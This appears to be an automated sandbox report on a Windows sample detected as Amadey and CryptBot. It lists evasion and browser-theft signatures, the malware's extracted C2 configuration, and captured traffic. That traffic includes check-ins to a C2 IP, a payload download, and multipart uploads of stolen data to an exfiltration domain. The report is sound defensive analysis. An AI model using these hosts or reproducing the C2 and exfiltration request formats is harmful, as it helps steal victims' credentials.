Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561382
MD5: f2d011251d3b81ee30bd85f4f705152b
SHA1: b18485051538caf49d226b94f882b68bcfcb7990
SHA256: e121118eb9676ffd4bebce8890b74d47dbd7051fce8a9bc5dea45552dccdcf56
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.43/Zu7JuNko/index.php8392001 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php1 Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpIk Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedb Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000001.00000003.1704826210.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.43/Zu7JuNko/index.php1 Virustotal: Detection: 12% Perma Link
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedb Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 63%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: f7fa65d988.exe, 00000007.00000003.2453750462.0000000007C42000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_a53c9479-2
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 27MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49743 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49754
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49781 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49851 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49896 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49862 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 08:22:11 GMTContent-Type: application/octet-streamContent-Length: 4497920Last-Modified: Sat, 23 Nov 2024 07:53:22 GMTConnection: keep-aliveETag: "674189f2-44a200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 50 c8 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 c8 00 00 04 00 00 f8 e7 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 3f c8 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 3e c8 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 3a 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 62 76 76 6d 6a 61 00 f0 1c 00 00 50 ab 00 00 f0 1c 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 64 6d 66 63 6c 6f 74 00 10 00 00 00 40 c8 00 00 04 00 00 00 7c 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 c8 00 00 22 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 33 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008392001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 465Content-Type: multipart/form-data; boundary=------------------------01D9fiCLyxe0MVea8WypPJData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 31 44 39 66 69 43 4c 79 78 65 30 4d 56 65 61 38 57 79 70 50 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 75 6b 6f 63 6f 68 61 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a b1 ab ab 68 11 70 b9 93 12 86 d6 10 21 72 e9 d6 79 43 3c b7 45 db bd 84 4c 19 d1 a8 14 d5 84 08 4b 0a 3d af f7 da 38 0f 84 8f 39 6a 53 24 3b d1 91 29 cb c8 aa 81 a4 ff 60 6b 55 ce 11 83 21 11 03 79 e9 af 3b 0b 53 0e 7a a8 49 82 1c 83 55 d0 a3 5b 38 fc 89 1b ac d4 ee 6e 3d 9a e9 ec 77 7a 31 b4 a4 76 b6 fa 8e 6f 67 f8 89 d0 b2 83 7a ff 56 5e 17 ac 12 ea 96 69 40 14 98 a2 84 db 8f 8b ec ff 18 1f 40 ac 9c 8c bb a5 f0 ac 56 4b b8 44 43 40 35 91 60 bb 25 92 85 dc dc 5f 7f 79 21 cb fd 0e d3 f7 a4 1f c8 8f f8 24 ee 5c 35 d5 c1 2f 42 fd 8d 59 e4 5a c3 95 58 94 e0 88 95 e6 22 0b ca e2 2e 96 42 b8 1b b5 fb 01 c1 6d 1c b6 44 fa 8a 40 40 f1 1c b3 3c a3 83 b0 14 00 70 b9 7f 00 6a 2e 92 0a 6f 2a ba 2e 92 7e 5c 55 05 86 10 3c e8 e8 25 91 52 a2 71 b9 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 31 44 39 66 69 43 4c 79 78 65 30 4d 56 65 61 38 57 79 70 50 4a 2d 2d 0d 0a Data Ascii: --------------------------01D9fiCLyxe0MVea8WypPJContent-Disposition: form-data; name="file"; filename="Lukocohap.bin"Content-Type: application/octet-streamhp!ryC<ELK=89jS$;)`kU!y;SzIU[8n=wz1vogzV^i@@VKDC@5`%_y!$\5/BYZX".BmD@@<pj.o*.~\U<%Rq--------------------------01D9fiCLyxe0MVea8WypPJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 89369Content-Type: multipart/form-data; boundary=------------------------WfGEh0YqLv3s8KPwJfqD3lData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 66 47 45 68 30 59 71 4c 76 33 73 38 4b 50 77 4a 66 71 44 33 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 61 6b 61 6b 61 6b 69 63 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 1d 4e 95 86 35 b5 37 e7 39 1d cd 18 b7 ed f7 9f 21 a1 2a 79 8b e1 2d 33 66 8e 7d 70 e2 b5 26 c9 23 24 04 fc 4f 05 17 2c d7 cd 2d 1c d4 1f 80 88 ee 99 be 72 8a e6 ad 18 08 56 4e be 83 86 fc d8 72 20 2b 6a dd b4 06 79 b8 ea 8a d1 19 90 d3 1c 7d 62 85 29 31 c7 29 f0 71 1f dc 3b 9f 64 26 40 8b 32 98 82 a7 cf 9c 46 e2 17 c5 26 bf 40 48 b9 c9 d8 76 cf 8a 65 e5 10 cb 61 5b 3e 48 37 ba 9b 3c f3 e7 19 29 15 8d 18 2d dd e1 54 43 82 5c 91 3c b8 ca ea 3f 08 7d cc 3e 8e 5a 14 fa 05 b3 18 51 dc 0d 01 30 c5 f9 ca 66 dd bd 09 fc 23 1a 43 1f 79 f2 e0 4e b8 50 7b 8d b4 19 64 bd ec a3 59 f8 10 33 31 85 c5 19 2a 60 83 ff 94 ea 02 58 c0 79 50 a3 5f 1b 33 a3 86 54 70 b7 f6 8c 63 eb 44 d6 f4 04 79 cc 80 46 16 9b 2d c2 04 5d 1e fc 3b a6 a4 1e c8 8b f2 46 68 27 e0 73 66 c2 7b 11 bd ad 54 4b 30 5a 84 fb 03 a3 3e 74 03 92 30 93 0d 65 b4 eb 74 ec f2 d6 7e 84 b5 9e 95 fa 20 88 49 ea 76 1b 4c b5 9e bb 46 9d d7 01 ab 05 04 9d d0 d1 57 69 65 6a ae 17 1b e9 c4 8f e2 f5 0d 90 9e ad 3e 35 55 91 ee f0 24 c5 c1 23 29 d5 34 45 70 e7 e9 73 54 08 69 12 af 80 d1 5b 44 3d e7 7e 6e 97 9d 2f ef 5c 34 eb 99 62 c3 e2 e0 2a ae 4c 22 e5 0c b9 18 d0 b1 85 d8 38 4b 3b 21 13 15 35 a2 62 59 bc cb bc 62 aa e4 36 cc d5 60 2b e2 4a f8 0d ff d7 fe af 65 25 7a e6 ed 6a 5a 7c 26 20 d4 18 4b f7 6f f2 c7 61 51 53 65 bf e0 a2 48 c3 1a 6b 63 84 21 05 c1 08 99 63 e8 37 6d 88 7d f1 38 07 c2 5e d1 cb bc 82 d9 be 7d 80 ca 19 4b ed 8a 7f a8 70 4a 27 70 49 13 17 eb f3 94 69 f4 61 0f c6 8e bb 95 90 b1 60 87 99 5d dc 8a b0 af 7e 5f 73 7b c1 ff db 5f 03 9f 12 29 42 9e 6f 2d 31 e8 71 61 e8 2a 54 e2 82 e1 6c f6 13 5b ed e5 82 2e cb 7a ba 0c 0e 80 86 f3 59 4f ee bf 7c 00 a4 52 f4 ab f2 78 b6 15 df b1 b1 19 bf e2 de 99 da 83 bf b7 92 b6 a3 2c 9e 62 3a c1 3d c9 c3 87 82 97 88 2f af b1 1f ee 4f ff 45 07 c4 ac cd a0 96 a4 b8 20 51 c3 37 8e 23 0d c3 85 af 70 0b fa b8 c5 d5 35 ad 9d 89 de d3 7d ca 17 26 ff 7a 85 e6 05 e2 c3 6d 3e c1 fc 3c ad 0a 9c 16 04 70 96 39 fd 31 15 20 c3 32 93 c6 ea 13 c5 b1 67 8f 4f 5c cb ac f5 77 f7 92 ea 39 ae b0 b7 46 b6 90 3b e0 3b 26 83 c3 7d 43 ad 31 4a eb 4a f1 b0 7a 60 3c 05 fb 51 aa 36 22 2f 3f b9 07 84 7a a9 be 1e 30 c5 08 49 f8 6d a2 86 9e 66 13 a9 f9 e5 8c fd 8c 3b fe 41 2f 61 ca 5e 49 2c da 81 49 8a bc 33 12 fb c3 96 b4 19 77 58 01 58 ac 13 53 41 11 ce a5 36 46 7b 6f a7 d7 4f a7 96 3d 7b ee e8 fc b5 e3 a4 19 45 da a8 48 52
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
